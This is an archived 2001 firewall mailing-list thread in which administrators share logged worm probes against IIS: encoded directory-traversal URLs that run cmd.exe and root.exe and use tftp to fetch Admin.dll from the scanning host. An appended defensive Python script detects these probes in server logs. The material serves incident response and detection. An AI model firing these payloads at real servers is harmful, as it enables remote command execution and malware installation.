everyone has
-----Original Message-----
From: Stu [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:49 AM
To: Jose Nazario
Cc: Luke Butcher; [EMAIL PROTECTED]
Subject: Re: something new afoot, sweeping scans:
has anyone seen a payload like this one?
I have been scanned by 59 separate hosts and they all hit 76 different URLs
unfortunately every 404 on the server triggers an email.....
this is cut down from the 76 distinct
all the tftp calls were requesting admin.dll from the host that performed
the scan
/_mem_bin/..%255c../..%255c../..%255c../Admin.dll
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/_vti_bin/..%255c../..%255c../..%255c../Admin.dll
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/c/Admin.dll
/c/winnt/system32/cmd.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+tftp%20-i%20
/d/Admin.dll
/d/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+tftp%20-i%20
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/MSADC/Admin.dll
/MSADC/root.exe?/c+dir
/MSADC/root.exe?/c+tftp%20-i%20
/scripts/..%%35%63../Admin.dll
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%%35c../Admin.dll
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
/scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%25%35%63../Admin.dll
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%252f../Admin.dll
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%255c../Admin.dll
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c0%2f../Admin.dll
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c0%af../Admin.dll
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c1%1c../Admin.dll
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/..%c1%9c../Admin.dll
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20
/scripts/Admin.dll
/scripts/root.exe?/c+dir
/scripts/root.exe?/c+tftp%20-i%20
Jose Nazario wrote:
> On Tue, 18 Sep 2001, Luke Butcher wrote:
>
> > Seeing hits from this new worm, looks like it tries circa 30 URLs.
> > Logic looks similar to Code Red II/III, in that most hits are coming
> > from similar class B and C networks.
>
> it's a huge shitstorm here. shutting us down all morning as our firewall
> connection tables are flooded. massive traffic floods ... the whole 9
> yards.
>
> here's the payloads culled from an apache server:
>
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> /c/winnt/system32/cmd.exe?/c+dir
> /d/winnt/system32/cmd.exe?/c+dir
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+C:%5C
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>
> hope that helps.
>
> ____________________________
> jose nazario [EMAIL PROTECTED]
> PGP: 89 B0 81 DA 5B FD 7E 00 99 C3 B2 CD 48 A0 07 80
> PGP key ID 0xFD37F4E5 (pgp.mit.edu)
>
> _______________________________________________
> Firewalls mailing list
> [EMAIL PROTECTED]
> http://lists.gnac.net/mailman/listinfo/firewalls
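A defender-side log check for the probe list in this thread, added here as an example and not code from any of the messages: it undoes the double-encoded and overlong-UTF-8 traversal forms the list shows (%255c, %25%35%63, %%35c, %c0%af, %c1%1c, %c1%9c and the rest), tags each request by what it asks for (Admin.dll, cmd.exe, root.exe, a tftp fetch), and groups the tags by source address over a few constructed Apache log lines with hypothetical IPs. It generalizes past the exact strings in the list to any nesting of those encodings.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed Apache common-log lines (hypothetical IPs), not from the thread.
SAMPLE_LOG = """\
10.0.0.7 - - [18/Sep/2001:10:40:01 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
10.0.0.7 - - [18/Sep/2001:10:40:02 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2010.0.0.7%20GET%20Admin.dll HTTP/1.0" 404 296
10.0.0.7 - - [18/Sep/2001:10:40:03 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 296
192.0.2.9 - - [18/Sep/2001:10:41:00 +0100] "GET /index.html HTTP/1.0" 200 1043
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) ')

def normalize(raw: str) -> str:
    # Undo the encodings in the probe list: repeated %-decoding (%255c, %25%35%63,
    # %%35c ...) and overlong two-byte UTF-8 (%c0%af -> '/', %c1%1c, %c1%9c -> '\').
    data = raw.encode("latin-1")
    for _ in range(3):                       # bounded decode-to-fixpoint
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):   # overlong 2-byte form
            out.append((((b & 0x1F) << 6) | (data[i + 1] & 0x3F)) & 0x7F)
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1").replace("\\", "/").lower()

def classify(request: str) -> set:
    # Tag one request target with the traits the probes in the thread share.
    path, _, query = request.partition("?")
    path, query = normalize(path), normalize(query)
    tags = {"traversal"} if "../" in path else set()
    tags |= {m for m in ("admin.dll", "cmd.exe", "root.exe") if path.endswith(m)}
    if "tftp" in query:                      # the fetch-and-run stage
        tags.add("tftp")
    return tags

def scan_log(text: str) -> dict:
    # Collect probe tags per client IP; requests that earn no tag are dropped.
    hits = defaultdict(set)
    for line in text.splitlines():
        if m := LOG_RE.match(line):
            hits[m.group(1)] |= classify(m.group(2))
    return {ip: tags for ip, tags in hits.items() if tags}
```

Run `scan_log(SAMPLE_LOG)` to see the per-IP tag sets; a host that collects "traversal" plus "tftp" in one sweep is the pattern every message in this thread describes.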